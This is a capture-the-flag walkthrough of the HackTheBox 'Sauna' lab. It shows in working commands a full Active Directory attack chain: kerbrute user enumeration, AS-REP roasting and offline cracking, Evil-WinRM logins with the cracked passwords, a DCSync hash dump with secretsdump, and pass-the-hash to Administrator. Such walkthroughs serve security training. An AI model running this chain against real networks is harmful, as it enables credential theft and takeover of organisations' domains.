Sauna
kerbrute, ASREProast, DCSync
- LHOST: 10.10.14.15
- RHOST: 10.129.95.180
Port scan:
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
Script scan:
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-07-10 16:55:50Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-07-10T16:56:17
|_ start_date: N/A
|_clock-skew: 7h00m00s
Full scan:
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49676/tcp open unknown
49694/tcp open unknown
49719/tcp open unknown
Making a script scan on extra ports: 5985, 9389, 49667, 49673, 49674, 49676, 49694, 49719
PORT STATE SERVICE VERSION
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
49719/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Enumerate SMB shares with crackmapexec:
crackmapexec smb $IP --shares
Here we learn that the NetBIOS name is
sauna and the domain is egotistical-bank.local:
crackmapexec smb enumeration
Recall that crackmapexec found a domain name:
egotistical-bank.local
Add the following entry to
/etc/hosts:10.129.181.201 egotistical-bank.local
In "About Us", we found a list of potential usernames:
potential usernames
Write down a list of possible usernames and save them as
users.txt:fsmith
scoins
hbear
btaylor
sdriver
This
[firstname initial][lastname] username pattern is commonly used in HTB boxes. In real world, you may want to generate a list of potential usernames based on emails or company policy.Enumerate valid usernames with kerbrute:
kerbrute userenum -d egotistical-bank.local --dc $IP users.txt
Here we found a valid username
[email protected]:
kerbrute
Update
users.txt:fsmith
Now we have a valid username
fsmith and we don't know his password. In such scenario, we can try ASREProast in order to get a TGT ticket and crack it offline. To learn the theory behind ASREProast, read the following post:How To Attack Kerberos 101
m0chan Blog - Info Sec, CTF & Hacking
How To Attack Kerberos 101
ASREProast with GetNPUsers:
impacket-GetNPUsers egotistical-bank.local/ -usersfile users.txt -dc-ip $IP
Note that the
/ in egotistical-bank.local/ is required, otherwise GetNPUsers won't recognize the string as a domain. It works:
GetNPUsers
Save the hash to a file named
hash.txt:impacket-GetNPUsers egotistical-bank.local/ -usersfile users.txt -dc-ip $IP -outputfile hash.txt
Crack the TGT ticket with John:
john-rockyou hash.txt
The plaintext password is
Thestrokes23:
John
Since port 5985 is open and we have a valid credential
fsmith:Thestrokes23, we can get shell with Evil-WinRM:evil-winrm -i $IP -u fsmith -p Thestrokes23
Get a user shell as
fsmith:
user shell
Upload winPEAS via Evil-WinRM
upload command and run it:cd C:\Windows\Tasks
upload /usr/share/windows-resources/winPEAS/winPEASx64.exe
.\winPEASx64.exe
winPEAS found an AutoLogon credential
svc_loanmanager:Moneymakestheworldgoround!:
winPEAS
However, the user
svc_loanmanager does not exist. Further enumeration shows that there exists a user svc_loanmgr:
net user
Try getting shell with credential
svc_loanmgr:Moneymakestheworldgoround! via Evil-WinRM:evil-winrm -i $IP -u svc_loanmgr -p Moneymakestheworldgoround!
Get shell as
svc_loanmgr:
lateral movement
Upload adPEAS via Evil-WinRM
upload command and run it:cd C:\Windows\Tasks
upload /usr/share/windows-resources/adPEAS/adPEAS.ps1
. .\adPEAS.ps1
Invoke-adPEAS
adPEAS found that
svc_loanmgr has DCSync rights:
adPEAS
Since we know the credential of
svc_loanmgr, we can do DCSync with secretsdump from Kali:impacket-secretsdump 'egotistical-bank.local/svc_loanmgr:Moneymakestheworldgoround!'@$IP
secretsdump found Administrator's NTLM hash:
secretsdump
The NTLM hash is:
823452073d75b9d1cf70ebdf86c7f98e
Recall that Evil-WinRM can do pass the hash, therefore we don't have to crack this hash. Try pass the hash with Evil-WinRM:
evil-winrm -i $IP -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e
Get SYSTEM shell:
SYSTEM shell
Last modified 8mo ago